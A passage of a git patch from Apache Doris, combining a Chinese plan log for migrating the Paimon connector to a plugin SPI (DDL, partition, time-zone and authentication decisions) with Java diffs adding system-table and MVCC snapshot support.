实现 `createTable`/`dropTable`(远端 + per-flavor authenticator;保留 latent remote-vs-local 名 bug 不修)| B3 | C | ✅ | override request-overload `createTable` + handle-based `dropTable`(idempotent ignoreIfNotExists=true);**D7=B:每 DDL call 包 `context.executeAuthenticated`**(读路径不包);remote-vs-local 名 bug 在 SPI 层 moot(请求单名 from `db.getRemoteName()`);`PluginDrivenExternalCatalog` 已 override FE 侧 | +| P5-T14 | 实现 `supportsCreateDatabase=true`+`createDatabase`(HMS-only-props gate 读 `session.getCatalogProperties()`)+`dropDatabase(force)` enumerate-loop | B3 | C | ✅ | gate 读注入 `catalogProperties`(= session.getCatalogProperties 同 map,更简)BEFORE auth;`dropDatabase(force)` = enumerate-loop **AND** native cascade(legacy `performDropDb:147-163` belt-and-suspenders,非 MC enumerate-only);createDatabase ignoreIfExists=false(FE 已 short-circuit);MC parity `:466/478` | +| P5-T15 | DDL 离线 UT(createDb gate / dropDb force 级联 / createTable schema / IF NOT EXISTS / type gap)| B3 | T | ✅ | 分布 4 新测类(`PaimonTypeMappingToPaimonTest`10 / `PaimonSchemaBuilderTest`10 / `PaimonConnectorMetadataDdlTest`9 / `PaimonConnectorMetadataDbDdlTest`11)+ `RecordingConnectorContext`(failAuth 钉 auth-wrap)+ `RecordingPaimonCatalogOps` DDL 扩;no-mockito,WHY+MUTATION | | P5-T16 | **新 E7 SPI**:`ConnectorMetadata.listSupportedSysTables`(default emptySet) + `getSysTableHandle`(default empty);保 MC/jdbc/es/trino 不受影响 | B4 | C | ⏳ | greenfield,签名须慎(被未来连接器复用)| | P5-T17 | paimon 实现 E7:名取 `SystemTableLoader.SYSTEM_TABLES`;`getSysTableHandle` 走 4-arg `Identifier(db,tbl,"main",sysName)`;handle 带 sysName+forceJni;reload fallback | B4 | C | ⏳ | branch="main" 限制保留+文档 | | P5-T18 | 通用 fe-core `PluginDrivenSysExternalTable extends PluginDrivenExternalTable`(报 PLUGIN_EXTERNAL_TABLE) + `NativeSysTable` factory;override `PluginDrivenExternalTable.getSupportedSysTables/findSysTable` 委托连接器 | B4 | C | ⏳ | 路由经 `PluginDrivenScanNode`,**勿报 PAIMON_EXTERNAL_TABLE** | @@ -163,6 +163,32 @@ B6 (procedure doc no-op, 独立) │ - 弃 `PaimonScanMetricsReporter`(连接器禁 import profile)→ EXPLAIN/profile paimon scan 指标回归 —— 登记为已知 behavior 回归。 - COUNT 下推 / cpp-reader / history-schema:初版翻闸**延后**(仅 perf/edge parity,correctness 不丢)—— 默认采纳。 +### D4–D6 — B2 设计定夺(✅ 签字 2026-06-09;code-grounded understand 复审纠偏 plan 前提) + +> B2 启动时 6-agent understand workflow + 主线 firsthand 核读,纠偏 **3 处 plan 前提**,用户签字 A/A/A(均推荐)。这 3 处 plan 备注(基于 recon)与 firsthand 代码冲突,按 Rule 7 不取平均、择 code 真相。 + +**D4 — T07 时间戳谓词 TZ → ✅ 采纳「parity-correct(不 session-TZ)」** +- **纠偏**:plan T07「session-TZ 化替固定 UTC」沿用 MC gotcha [[catalog-spi-connector-session-tz-gotcha]],但 firsthand 核:legacy `paimon/source/PaimonValueConverter:149` 时间戳字面量用**固定 GMT/UTC** 转 epoch,且**无** `visit(LocalZonedTimestampType)`(LTZ 落 defaultMethod→null→**legacy 根本不下推 LTZ**)。连接器现 `PaimonPredicateConverter:284` 固定 `ZoneOffset.UTC` 对 NTZ **已 = legacy parity**;对 NTZ session-TZ 化会移位下推谓词 vs paimon UTC-based min/max stats → **假裁剪丢行**。MC≠paimon(时间戳存储语义不同)。 +- **决定**:NTZ 保持 UTC(勿动 zone);LTZ 改为**不下推**(`TIMESTAMP_WITH_LOCAL_TIME_ZONE` return null,补齐 legacy parity + 修当前 over-push 的潜在 LTZ 假裁剪);加 `PaimonConnectorMetadata.supportsCastPredicatePushdown=false`(镜像 MC:331-334)。**不** session-TZ 化、**不**加 ZoneId 惰性解析。 + +**D5 — T08/T09 分区处理 scope → ✅ 采纳「minimal/safe」** +- **纠偏(latent bug)**:`PaimonConnectorMetadata.getTableSchema:133` 发 schema key `partition_keys`,但 fe-core `PluginDrivenExternalTable:181` 读 `partition_columns`(MC 正确发 `partition_columns:163`)→ **FE 现把所有 paimon 表当非分区**(SHOW PARTITIONS/TVF 空、`getNameToPartitionItems` 空、无 MTMV 分区喂)。paimon 经谓词下推(`ReadBuilder.withFilter`+SDK `scan.plan`)仍正确裁剪分区/文件,行数 parity 不丢。 +- **决定(B2)**:T09 = **文档化纯谓词裁剪**(不 override 6-arg `planScan`;scan-correct,EXPLAIN partition=N/M 显示损失为已知 cosmetic gap)。T08 = 实现连接器侧 `listPartitions*`(连接器 SPI deliverable,B5/B9 复用)+ 扩 seam `listPartitions(Identifier)`,但 **B2 不翻 `partition_columns` key、不接 FE 消费**;**`getProperties` 不实现**(实现中 firsthand 纠偏:`ConnectorMetadata.getProperties()` 在 fe-core 零消费方 + MC 不 override + 返原始 props 会泄漏 ak/sk 凭据 → 留 emptyMap stub)(避免提前激活 FE 分区裁剪→ prune-dataloss 危险区 [[catalog-spi-nonpartitioned-prune-dataloss]] / [[catalog-spi-plugindriven-explain-override-gap]],须与 requiredPartitions 处理同落)。**key 翻 + 6-arg planScan/requiredPartitions + MTMV 分区喂 = B5 前置硬门**(记入 B5)。 +- **NTZ/LTZ 谓词与分区**:分区裁剪走纯谓词;上面 D4 的 LTZ 不下推不影响分区裁剪正确性(LTZ 极少做分区列)。 + +**D6 — T10 连接器 cache scope → ✅ 采纳「延后至翻闸」** +- **纠偏**:plan 前提「REFRESH CATALOG 经 `PluginDrivenExternalCatalog:530-534` 销毁 connector」**证伪**——firsthand:`RefreshManager.refreshCatalogInternal` 只调 `((ExternalCatalog)c).onRefreshCache(invalidCache)`(清 fe-core cache via `invalidateCatalog`,**connector 存活**);`resetToUninitialized`→`onClose`(连接器销毁) 仅 `CatalogMgr.addCatalog`/MODIFY/DROP CATALOG 触发,**REFRESH CATALOG 不触**。REFRESH TABLE 也**永不达 connector**(`refreshTableInternal` 只 `unsetObjectCreated`+`ExtMetaCacheMgr.invalidateTableCache`,全留 fe-core)。`ConnectorMetadata` SPI 无任何 invalidate/refresh hook。 +- **决定**:B2 **不加** connector cache(normal-read 无 cache 即正确;现每次 `catalogOps.getTable` 打活 catalog)。cache + invalidation SPI 设计(default-no-op `invalidateTable(...)` + `onRefreshCache` 触发的 connector clear hook + RefreshManager wiring)记为 **B8/删 legacy 前置**,随翻闸落地(fe-core SPI/RefreshManager wiring 与 cutover 同批更合理)。否则 naive cache 在 REFRESH CATALOG/TABLE 后供陈旧 Table/schema。 + +### D7 — B3 DDL authenticator scope → ✅ **采纳 B(legacy parity:每 DDL call 包 `executeAuthenticated`)** + +> B3 启动时 6-agent understand workflow + 主线 firsthand 核读,纠偏 **1 处 plan 前提**(其余 T11-T15 plan 备注与 code 一致,含纠偏「PluginDrivenExternalCatalog 已 override FE 侧」**证实为真**——memory [[catalog-spi-cutover-fe-dispatch-gap]] 警告的 FE 分发缺口对 paimon DDL 不适用,MC 已证端到端通;缺口的真闸是 `SPI_READY_TYPES` 成员,属 B7/T27 非 B3)。 + +- **纠偏**:plan T13「per-flavor authenticator」沿用 legacy 直觉,但 firsthand:① MC DDL **完全不**用 authenticator(不同 auth 模型);② legacy `PaimonMetadataOps` **每个**远端 DDL call 包 `executionAuthenticator.execute`;③ **B2 刚落地的 read 路径不 re-wrap**(靠 catalog 构建时 `PaimonConnector.createCatalogFromContext:166-172` 的一次 wrap);④ `PaimonConnectorMetadata` 当前**不**收 `ConnectorContext`。 +- **fork**:A=match B2 read 路径(不 per-call wrap,靠构建时 wrap,per-call authenticator 作单一 connector-wide live-e2e 项,已是 R-中)|**B=legacy parity(thread `ConnectorContext` 入 metadata + 每 DDL op 包 `executeAuthenticated`)**。 +- **用户签 B**:metadata-level wrap(保 seam 为纯 Catalog delegate);4 个 DDL op(createTable/dropTable/createDatabase/dropDatabase)各包一次 `context.executeAuthenticated`(dropDatabase 的 enumerate-loop+cascade 整体一个 scope,UGI doAs 可重入,行为等价 legacy);**read 路径仍不 wrap**(B 仅 DDL 域,未回改 B2)。`executeAuthenticated` 默认 no-op → 离线测不受影响,正确性须 live-e2e 验。 +- **遗留不一致(记录)**:read 路径未 per-call wrap(B2 决策),DDL 已 wrap(D7=B)——若 live-e2e 证 Kerberized **读**也需 call-time doAs,则 read 路径须补 wrap(B2 回改,非 B3 范围)。归入翻闸前 live-e2e authenticator 门。 + --- ## 风险 / 开放问题 @@ -186,6 +212,23 @@ B6 (procedure doc no-op, 独立) │ ## 阶段日志(倒序) +### 2026-06-10(B3 实现:DDL metadata,T11-T15;understand workflow 纠偏 1 处 → 用户签 D7=B;subagent-driven 3 dispatch + 双审 + 3-lens final holistic = 全 READY) +- **6-agent understand workflow + 主线 firsthand 核读**:T11-T15 plan 备注大体与 code 一致;**纠偏 1 处** → 用户签 **D7=B**(DDL authenticator = legacy parity,每 DDL call 包 `executeAuthenticated`,见开放决策 D7)。另**证实** plan「PluginDrivenExternalCatalog 已 override FE 侧」为真(FE 4 个 DDL 分发 createTable:300/createDb:355/dropDb:387/dropTable:439 已通用接 SPI,MC 已证;闸是 `SPI_READY_TYPES` 成员=B7,非 B3 缺口)。understand workflow 中 2 个 agent 返回退化 stub,由其余 4 agent 全覆盖(cross-verified)。 +- **D1(T11+T12)**:`PaimonTypeMapping.toPaimonType(ConnectorType)`(reverse 方向,byte-parity `DorisToPaimonTypeVisitor.atomic`,gap→`DorisConnectorException`,map-key `.copy(false)`,struct id `AtomicInteger(-1)`)+ 新 `PaimonSchemaBuilder.build(request)`(port `toPaimonSchema`,2 故意 safer 偏差:comment fallback、PK drop-blank;非-identity transform→throw)。20 新测。 +- **D2(seam + auth + T13)**:`PaimonCatalogOps` 加 4 DDL 方法(+ `CatalogBackedPaimonCatalogOps` delegations + `RecordingPaimonCatalogOps` fake,paimon `Catalog` 签名经 javap 核);**thread `ConnectorContext` 入 `PaimonConnectorMetadata`(3-arg ctor,无 2-arg;`PaimonConnector.getMetadata` 传 context)**;`createTable`(override request-overload,`PaimonSchemaBuilder` build 在 wrap 外 → schema-fail raw)+ `dropTable`(handle-based idempotent)各包 `executeAuthenticated`,异常→`DorisConnectorException`;read 路径**不** wrap。9 DDL 测(含 2 个 failAuth auth-wrap mutation 测 + schema-build-fail-propagation 测)。 +- **D3(T14)**:`supportsCreateDatabase=true` + `createDatabase`(HMS-only-props gate,flavor 读注入 `catalogProperties`,gate 在 auth 前;ignoreIfExists=false)+ 4-arg `dropDatabase(force)`(enumerate-loop + native cascade 整体一个 auth scope)。11 DB-DDL 测(含 force-cascade 顺序、force-空库、HMS-gate 3 例、auth-wrap)。 +- **验证(主线 firsthand 复跑)**:`Tests run: 96, Failures: 0, Errors: 0, Skipped: 1`(1=live)+ BUILD SUCCESS + checkstyle 0 + import-gate 0 + **无 fe-core/fe-connector-api/fe-connector-spi 改动**(B3 纯连接器侧,FE override 已通用存在)+ 无 B7 cutover 泄漏(SPI_READY_TYPES/GSON/pluginCatalogTypeToEngine/PhysicalPlanTranslator 未碰)。每 dispatch implement→spec-review→quality-review 双审(均 mutation-verified),final 3-lens holistic(parity / adversarial / scope-build)= 全 READY,仅 NIT(已修 `PaimonSchemaBuilder` 类 javadoc「byte-for-byte」过度声明 → 「functional port + 2 documented divergences」)。 +- **B3 改动未提交**(用户决定何时 commit)。B2+B3 改动同处 dirty tree(B2 normal-read 仍未提交)。 + +### 2026-06-10(B2 实现:normal-read,T06-T10;subagent-driven 3 dispatch + 双审 + final holistic = READY) +- **6-agent understand workflow + 主线 firsthand 核读** 纠偏 **3 处 plan 前提** → 用户签 D4/D5/D6(A/A/A,见开放决策):T07 非 session-TZ、T08/T09 minimal/safe、T10 cache 延后。 +- **T06(BLOCKER)**:`PaimonScanPlanProvider` 加 `PaimonCatalogOps` 注入(`getScanPlanProvider` 镜像 `getMetadata:86`)+ 包私 `resolveTable`(transient null→`catalogOps.getTable` 重建,byte-identical `getColumnHandles:160-171`),planScan + getScanNodeProperties **两 site 都护**(recon 只点 :95,复审补出 :204 同 NPE)。2 直测 `resolveTable`(`FakePaimonTable.newReadBuilder` 抛 → 不能端到端跑 planScan,测 helper 直接)。 +- **T07(parity-correct TZ)**:拆 NTZ/LTZ——`TIMESTAMP_WITHOUT_TIME_ZONE` 保固定 UTC(= legacy `PaimonValueConverter:149` GMT;session-TZ 会移位 vs paimon UTC min/max stats → 假裁剪丢行)、`TIMESTAMP_WITH_LOCAL_TIME_ZONE` 改 `return null`(= legacy 无 `visit(LocalZonedTimestampType)` → 不下推,修当前 over-push);加 `supportsCastPredicatePushdown=false`(镜像 MC:331-334)。新 `PaimonPredicateConverterTest`(NTZ 值钉 UTC millis / LTZ·FLOAT·CHAR 不推 / INT control)+ cap 测。 +- **T08(partition listing,dormant)**:扩 seam `listPartitions(Identifier)`;实现 `listPartitionNames/listPartitions/listPartitionValues`(legacy `generatePartitionInfo:169-187` byte-parity:spec 迭代 + legacy-name DATE 经 **paimon `org.apache.paimon.utils.DateTimeUtils.formatDate`**(legacy 同款,无漂移)、DATE 检测经 `DataTypeRoot.DATE`;6-arg `ConnectorPartitionInfo` raw spec values + `lastFileCreationTime`/`recordCount`/`fileSizeInBytes`;filter 忽略 doc)。共享 `collectPartitions`+`resolveTable`(`getColumnHandles` 重构复用,byte-identical,B0 测仍绿)。**`getProperties` 不实现**(纠偏:fe-core 零消费方 + MC 不 override + 凭据泄漏 → 留 emptyMap stub)。新 `PaimonConnectorMetadataPartitionTest`(5) + 扩 `FakePaimonTable.options()`/`RecordingPaimonCatalogOps`。 +- **T09**:`PaimonScanPlanProvider` 类 Javadoc 钉纯谓词裁剪(6-arg `planScan` 故意不 override;EXPLAIN partition=0/0 = 已知 B5 显示 gap)。**T10**:D6 决策 + 文档(cache + invalidation SPI 延后 B8),无 code。 +- **验证(主线 firsthand 每任务复跑)**:`Tests run: 56, Failures: 0, Errors: 0, Skipped: 1`(1=live)+ checkstyle 0 + import-gate 0 + 无 fe-core 改动 + `partition_keys` schema key 未翻。每任务 implement→spec-review→quality-review 双审 PASS(spec/quality 均 mutation-verified),final holistic review = READY。 +- **B5 reconcile 项(非 B2 风险,dormant)**:`listPartitionValues` 返 **RAW** spec 值(如 DATE epoch-day `19723`),legacy `partition_values()` TVF 返 **RENDERED**(`2024-01-01`,经解析 partitionName);B5 接 TVF + 翻 `partition_columns` key 时须核 raw-vs-rendered 一致性。 + ### 2026-06-09(B1 实现:flavor 装配,全 5 flavor,单 Catalog) - **用户签字 all-5-flavors**(非分阶段);内部 2-dispatch 落地(dispatch1=offline core+paimon-core 3 flavor 活线;dispatch2=hms/dlf 活线+pom deps),每 dispatch implement→spec-review→quality-review→fix-loop→re-review,主线 firsthand 复跑构建。 - **T04**:`PaimonConnectorProperties` 加全 flavor key 常量(HMS/REST/JDBC/DLF,多别名 `String[]`)。 @@ -226,6 +269,6 @@ B6 (procedure doc no-op, 独立) │ ## 当前阻塞项 -- 无硬阻塞(D1=A / D2=A 已签字;**B0 + B1 已完成 2026-06-09**)。下一 session 起 **B2**(normal-read:T06 transient-Table reload BLOCKER / T07 session-TZ 谓词 / T08 listPartitions+lastModifiedMillis / T09 6-arg planScan 分区裁剪 / T10 连接器内 cache);**B6**(procedure doc no-op,独立)可随时落。 -- 翻闸(B7)仍 gated on B2+B3+B4+B5 全完 + live e2e(用户真实 paimon 各 flavor 环境)。**B1 新增 4 个翻闸/live-e2e 硬门**(见阶段日志 B1 条 + 「风险/开放问题」):hms/dlf metastore-client 跨 loader、jdbc driver_url 安全 allow-list、hive-site.xml 文件加载、live createCatalog——pre-cutover 不可离线测,翻闸前用户须 live 验。 -- B1 复用资产:`PaimonCatalogFactory`(纯 options/conf 构建器,B3 DDL 可复用 flavor 解析 + conf 构建);seam(B2-B3 须扩 DDL 方法 + 同步 `RecordingPaimonCatalogOps`/`CatalogBackedPaimonCatalogOps`);parity doc 是后续批次 gap 清单 + 翻闸门基准。 +- 无硬阻塞(D1=A / D2=A / D4=A / D5=A / D6=A / D7=B 已签字;**B0 + B1 + B2 + B3 已完成**)。下一 session = **B4**(sys-tables E7 + MVCC E5;gated on B2+B3 全完,现满足):T16 新 E7 SPI(`listSupportedSysTables`/`getSysTableHandle` default-empty)/ T17 paimon 实现 E7 / T18 通用 `PluginDrivenSysExternalTable` / T19 forceJni 分支(binlog/audit_log)/ T20 首个 E5 消费者(`beginQuerySnapshot`/`getSnapshotAt`/`getSnapshotById`)。**注意 T16/T18 是 greenfield SPI 新面(被未来连接器复用,签名须慎)**。**B6**(procedure doc no-op,独立)可随时穿插。B5(MTMV 桥)gated on B4。 +- 翻闸(B7)仍 gated on B2+B3+B4+B5 全完 + live e2e(用户真实 paimon 各 flavor 环境)。**翻闸/live-e2e 硬门**(见阶段日志 B1 条 + 「风险/开放问题」):hms/dlf metastore-client 跨 loader、jdbc driver_url 安全 allow-list、hive-site.xml 文件加载、live createCatalog;**B3 新增 live-e2e 门**:DDL 的 `executeAuthenticated`(D7=B)在 Kerberized HMS/HDFS createTable/dropDatabase 正确性(离线 no-op,须 live 验)+ `lastFileCreationTime` 等 B2 dormant 项——pre-cutover 不可离线测,翻闸前用户须 live 验。 +- 复用资产:`PaimonCatalogFactory`(纯 options/conf 构建器 + `resolveFlavor`,B3 createDatabase HMS-gate 已复用);`PaimonCatalogOps` seam(现含 5 read + 4 DDL,B4 sys-table 可能再扩);`PaimonTypeMapping`(双向);`PaimonSchemaBuilder`;`RecordingPaimonCatalogOps`/`RecordingConnectorContext` 测基建(B4 复用);parity doc 是后续批次 gap 清单 + 翻闸门基准。 From d5e3c0fbf8b51cc8de953606a292c2a590e2083f Mon Sep 17 00:00:00 2001 From: morningman Date: Wed, 10 Jun 2026 09:18:45 +0800 Subject: [PATCH 012/128] [P5-T16~T20] (connector) P5 paimon B4: sys-tables (E7) + MVCC (E5) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Port paimon system tables and MVCC snapshots onto the plugin connector SPI. - T16: greenfield E7 SPI on ConnectorTableOps — listSupportedSysTables + getSysTableHandle (default no-ops; MC/jdbc/es/trino unaffected). - T17: PaimonConnectorMetadata implements E7 — names from SystemTableLoader.SYSTEM_TABLES; sys table loaded via the existing getTable seam with a 4-arg Identifier(db,table,"main",sysName); sys handle carries sysTableName + forceJni (binlog/audit_log); shared PaimonTableResolver gives metadata + scan one sys-aware reload rule. - T18: generic fe-core glue — PluginDrivenExternalTable centralizes handle acquisition into resolveConnectorTableHandle and delegates getSupportedSysTables to the connector; new PluginDrivenSysExternalTable (reports PLUGIN_EXTERNAL_TABLE) + PluginDrivenSysTable reuse the live SysTableResolver/NativeSysTable machinery (reusable by future connectors). - T19: forceJni gate so binlog/audit_log go JNI not native; buildTableDescriptor -> HIVE_TABLE (also fixes a latent normal-table SCHEMA_TABLE descriptor gap, DV-024); PluginDrivenScanNode fail-loud guard rejects scan-params/time-travel on system tables. - T20: first E5 MVCC consumer — beginQuerySnapshot/getSnapshotAt/getSnapshotById (empty table -> -1; sys handle -> empty) + SUPPORTS_MVCC_SNAPSHOT/TIME_TRAVEL capabilities. Inert until B5 wires the fe-core MvccTable consumer. Decisions: D-039 (E7 reuses the live SysTable machinery; RFC §10's $-suffix-via-getTableHandle design was never implemented and is superseded, DV-023). Deviations: DV-023, DV-024. Verification: import-gate 0; connector 124 tests pass (1 live skipped); fe-core PluginDriven*Test 100 pass; checkstyle 0; no cutover/B5 leakage (paimon not in SPI_READY_TYPES; PluginDrivenExternalTable still not an MvccTable). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../connector/api/ConnectorTableOps.java | 26 ++ .../connector/paimon/PaimonCatalogOps.java | 58 +++ .../connector/paimon/PaimonConnector.java | 15 + .../paimon/PaimonConnectorMetadata.java | 255 ++++++++++-- .../paimon/PaimonScanPlanProvider.java | 45 ++- .../connector/paimon/PaimonTableHandle.java | 72 +++- .../connector/paimon/PaimonTableResolver.java | 73 ++++ .../PaimonBuildTableDescriptorTest.java | 84 ++++ .../PaimonConnectorMetadataMvccTest.java | 242 ++++++++++++ .../PaimonConnectorMetadataSysTableTest.java | 365 ++++++++++++++++++ .../paimon/PaimonScanPlanProviderTest.java | 86 +++++ .../paimon/RecordingPaimonCatalogOps.java | 44 +++ .../datasource/PluginDrivenExternalTable.java | 59 ++- .../datasource/PluginDrivenScanNode.java | 45 ++- .../PluginDrivenSysExternalTable.java | 108 ++++++ .../systable/PluginDrivenSysTable.java | 46 +++ .../PluginDrivenScanNodeSysHandleTest.java | 217 +++++++++++ ...PluginDrivenScanNodeSysTableGuardTest.java | 106 +++++ .../datasource/PluginDrivenSysTableTest.java | 304 +++++++++++++++ plan-doc/01-spi-extensions-rfc.md | 2 + plan-doc/HANDOFF.md | 62 +-- plan-doc/PROGRESS.md | 21 +- plan-doc/connectors/paimon.md | 21 +- plan-doc/decisions-log.md | 1 + plan-doc/deviations-log.md | 4 +- plan-doc/tasks/P5-paimon-migration.md | 26 +- 26 files changed, 2266 insertions(+), 121 deletions(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableResolver.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonBuildTableDescriptorTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataSysTableTest.java create mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSysExternalTable.java create mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/systable/PluginDrivenSysTable.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeSysHandleTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeSysTableGuardTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenSysTableTest.java diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorTableOps.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorTableOps.java index 1870954060cd3f..056f8f315d7c9d 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorTableOps.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorTableOps.java @@ -39,6 +39,32 @@ default Optional getTableHandle( return Optional.empty(); } + /** + * Lists the system-table names supported for the given base table + * (e.g. ["snapshots", "schemas", "options", "audit_log", "binlog"]). + * + *

    The names are WITHOUT any "$" prefix; fe-core composes the + * "{baseTable}${sysName}" reference name. Default: empty (no system + * tables). Implemented by connectors that expose system tables.

    + */ + default List listSupportedSysTables(ConnectorSession session, + ConnectorTableHandle baseTableHandle) { + return Collections.emptyList(); + } + + /** + * Returns a handle for the named system table of the given base table, + * or empty if this connector does not expose that system table. + * + *

    The returned handle is connector-internal and carries whatever the + * connector needs (system-table name, scan-routing hints, etc.); it is + * opaque to fe-core. {@code sysName} is the bare name (no "$").

    + */ + default Optional getSysTableHandle(ConnectorSession session, + ConnectorTableHandle baseTableHandle, String sysName) { + return Optional.empty(); + } + /** Returns the schema (columns, format, etc.) for the given table. */ default ConnectorTableSchema getTableSchema( ConnectorSession session, ConnectorTableHandle handle) { diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java index 0db505afde7658..723c48d73df7b9 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java @@ -17,15 +17,19 @@ package org.apache.doris.connector.paimon; +import org.apache.paimon.Snapshot; import org.apache.paimon.catalog.Catalog; import org.apache.paimon.catalog.Database; import org.apache.paimon.catalog.Identifier; import org.apache.paimon.partition.Partition; import org.apache.paimon.schema.Schema; +import org.apache.paimon.table.DataTable; import org.apache.paimon.table.Table; +import java.io.FileNotFoundException; import java.util.List; import java.util.Map; +import java.util.OptionalLong; /** * Injection seam over the remote Paimon {@link Catalog} calls. @@ -67,6 +71,33 @@ void createTable(Identifier identifier, Schema schema, boolean ignoreIfExists) void dropTable(Identifier identifier, boolean ignoreIfNotExists) throws Catalog.TableNotExistException; + // ---- E5: MVCC snapshot lookups (T20) ---- + // These return plain {@code long}s (not paimon {@code Snapshot} objects) so the metadata + // layer's MVCC logic (sys-guard, empty->-1, found/empty mapping) is unit-testable offline with + // {@code RecordingPaimonCatalogOps} — faking a concrete paimon {@code Snapshot}/ + // {@code SnapshotManager} directly is impractical. The production impl uses the paimon SDK. + + /** + * Returns the latest snapshot id of {@code table} ({@code table.latestSnapshot().get().id()}), + * or empty when the table has no snapshot (empty table). The caller maps empty to the legacy + * {@code INVALID_SNAPSHOT_ID} (-1). + */ + OptionalLong latestSnapshotId(Table table); + + /** + * Returns the id of the latest snapshot committed at or before {@code timestampMillis} + * ({@code snapshotManager().earlierOrEqualTimeMills(ts)}), or empty when no such snapshot + * exists (the SDK returns null). + */ + OptionalLong snapshotIdAtOrBefore(Table table, long timestampMillis); + + /** + * Returns {@code true} iff a snapshot with {@code snapshotId} exists + * ({@code snapshotManager().tryGetSnapshot(id)} succeeds; a {@code FileNotFoundException} from + * the SDK means it does not exist). + */ + boolean snapshotExists(Table table, long snapshotId); + void close() throws Exception; /** @@ -129,6 +160,33 @@ public void dropTable(Identifier identifier, boolean ignoreIfNotExists) catalog.dropTable(identifier, ignoreIfNotExists); } + @Override + public OptionalLong latestSnapshotId(Table table) { + return table.latestSnapshot() + .map(snapshot -> OptionalLong.of(snapshot.id())) + .orElseGet(OptionalLong::empty); + } + + @Override + public OptionalLong snapshotIdAtOrBefore(Table table, long timestampMillis) { + // Time-travel by wall-clock requires the snapshotManager(), which only DataTable exposes + // (legacy PaimonUtil.getPaimonSnapshotByTimestamp casts to DataTable too). + Snapshot snapshot = ((DataTable) table).snapshotManager().earlierOrEqualTimeMills(timestampMillis); + return snapshot == null ? OptionalLong.empty() : OptionalLong.of(snapshot.id()); + } + + @Override + public boolean snapshotExists(Table table, long snapshotId) { + try { + // tryGetSnapshot throws FileNotFoundException when the id does not exist (legacy + // PaimonUtil.getPaimonSnapshotBySnapshotId catches the same exception). + ((DataTable) table).snapshotManager().tryGetSnapshot(snapshotId); + return true; + } catch (FileNotFoundException e) { + return false; + } + } + @Override public void close() throws Exception { catalog.close(); diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index aee8b325c28e45..073501cbb1bc63 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -18,6 +18,7 @@ package org.apache.doris.connector.paimon; import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorCapability; import org.apache.doris.connector.api.ConnectorMetadata; import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; @@ -37,6 +38,7 @@ import java.net.MalformedURLException; import java.net.URL; import java.net.URLClassLoader; +import java.util.EnumSet; import java.util.Map; import java.util.Set; import java.util.concurrent.ConcurrentHashMap; @@ -92,6 +94,19 @@ public ConnectorScanPlanProvider getScanPlanProvider() { new PaimonCatalogOps.CatalogBackedPaimonCatalogOps(ensureCatalog())); } + /** + * Declares the E5 read-path capabilities paimon supports: MVCC snapshot pinning and time travel + * (FOR TIME TRAVEL / FOR VERSION AS OF). The B5 fe-core MvccTable wiring keys off these to call + * {@link PaimonConnectorMetadata#beginQuerySnapshot} / {@code getSnapshotAt} / {@code getSnapshotById}. + * No write capability is declared: paimon write is not migrated. + */ + @Override + public Set getCapabilities() { + return EnumSet.of( + ConnectorCapability.SUPPORTS_MVCC_SNAPSHOT, + ConnectorCapability.SUPPORTS_TIME_TRAVEL); + } + private Catalog ensureCatalog() { if (catalog == null) { synchronized (this) { diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java index 7a0d38ee038607..330e12d7ced946 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java @@ -27,8 +27,12 @@ import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; import org.apache.doris.connector.api.handle.ConnectorColumnHandle; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; import org.apache.doris.connector.api.pushdown.ConnectorExpression; import org.apache.doris.connector.spi.ConnectorContext; +import org.apache.doris.thrift.THiveTable; +import org.apache.doris.thrift.TTableDescriptor; +import org.apache.doris.thrift.TTableType; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -37,6 +41,7 @@ import org.apache.paimon.partition.Partition; import org.apache.paimon.schema.Schema; import 